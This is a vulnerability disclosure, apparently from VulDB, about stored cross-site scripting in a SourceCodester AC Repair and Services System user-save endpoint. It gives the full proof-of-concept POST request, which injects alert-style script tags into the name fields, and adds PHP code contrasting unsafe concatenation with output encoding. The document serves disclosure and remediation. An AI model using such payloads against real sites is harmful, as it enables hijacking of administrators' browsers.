Submission #180834: SourceCodester AC Repair and Services System Users.php cross site scripting: Information

Title: SourceCodester AC Repair and Services System Users.php cross site scripting
Description: I discovered an XSS vulnerability in SourceCodester AC Repair and Services System (https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html). It is in url/classes/Users.php?f=save.

POST /php-acrss/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------248310740335140400871461243690
Content-Length: 1077
Origin: http://localhost
Connection: close
Referer: http://localhost/php-acrss/admin/?page=user/manage_user
Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="id"

1
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="firstname"

<ScRipt>alert(1)</ScRipt>
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="middlename"

<ScRipt>alert(1)</ScRipt>
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="lastname"

123
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="username"

123
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="password"

123
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="type"

2
-----------------------------248310740335140400871461243690
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream

-----------------------------248310740335140400871461243690--

This is a storage-based XSS vulnerability where anyone who accesses url/php-acrss/admin/?page=user/list will receive pop-up windows, because the XSS code is directly concatenated into the source code. The repair method is to filter parameters such as username once, for characters such as <, >, etc.
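The root cause the report names (stored field values concatenated straight into the HTML of the user list) and the fix it recommends (filtering characters such as < and > on save), shown side by side as an added PHP example. This is not the project's code and not from the submitter: the rendering functions, the validator, the sample rows and the column names are assumptions, and the real manage_user/list page of the application may be laid out differently.

```php
<?php
// Added example (not the project's own code). Function names, column names
// and the sample rows below are assumptions made for illustration.
declare(strict_types=1);

// Constructed sample rows, as the users table might look after the request in
// the report above has been saved, plus one ordinary row with an apostrophe.
$rows = [
    ['id' => 1, 'firstname' => '<ScRipt>alert(1)</ScRipt>', 'middlename' => '<ScRipt>alert(1)</ScRipt>', 'lastname' => '123', 'username' => '123'],
    ['id' => 2, 'firstname' => "O'Brien", 'middlename' => 'B', 'lastname' => 'Smith', 'username' => 'obrien'],
];

// Vulnerable pattern: the stored value is concatenated into the markup as-is,
// so any tag stored in the column is interpreted by the browser of every
// administrator who opens the list (stored XSS).
function renderRowVulnerable(array $u): string
{
    return '<tr><td>' . $u['firstname'] . ' ' . $u['middlename'] . ' ' . $u['lastname']
        . '</td><td>' . $u['username'] . '</td></tr>';
}

// Hardened pattern: encode for the HTML text context at output time.
// ENT_QUOTES also encodes both quote characters (needed inside attributes);
// ENT_SUBSTITUTE keeps invalid UTF-8 from silently turning the field into "".
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderRowSafe(array $u): string
{
    $fullName = trim($u['firstname'] . ' ' . $u['middlename'] . ' ' . $u['lastname']);
    return '<tr><td>' . e($fullName) . '</td><td>' . e($u['username']) . '</td></tr>';
}

// Defence in depth on Users.php?f=save: reject name fields containing characters
// a name never needs, which is the "filter < and >" fix the report suggests.
// Output encoding above is still the control that actually stops the XSS,
// because data can reach the table by other routes (imports, older rows).
function isPlausibleName(string $s): bool
{
    return $s !== ''
        && mb_strlen($s, 'UTF-8') <= 100
        && preg_match('/^[\p{L}\p{M}\' .-]+$/u', $s) === 1;
}

foreach ($rows as $u) {
    echo 'vulnerable: ' . renderRowVulnerable($u) . PHP_EOL;
    echo 'hardened:   ' . renderRowSafe($u) . PHP_EOL;
    echo 'firstname accepted by validator: ' . (isPlausibleName($u['firstname']) ? 'yes' : 'no') . PHP_EOL;
}
```

Run with `php example.php`: the first row's script tags appear literally in the "vulnerable" line and as `&lt;ScRipt&gt;` in the "hardened" line, and the validator rejects that firstname while accepting "O'Brien". The point worth checking in the real application is that every place the user table is rendered (not only the list page the report mentions) goes through the encoding helper, since the stored value is the same everywhere.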
Source: ⚠️ https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
User: fushuling (UID 45488)
Submitted: 11/07/2023 06:14 PM (3 years ago)
Moderation: 13/07/2023 11:49 AM (2 days later)
Status: Approved
VulDB Entry: 234013 [SourceCodester AC Repair and Services System 1.0 manage_user firstname/middlename cross site scripting]
Points: 20
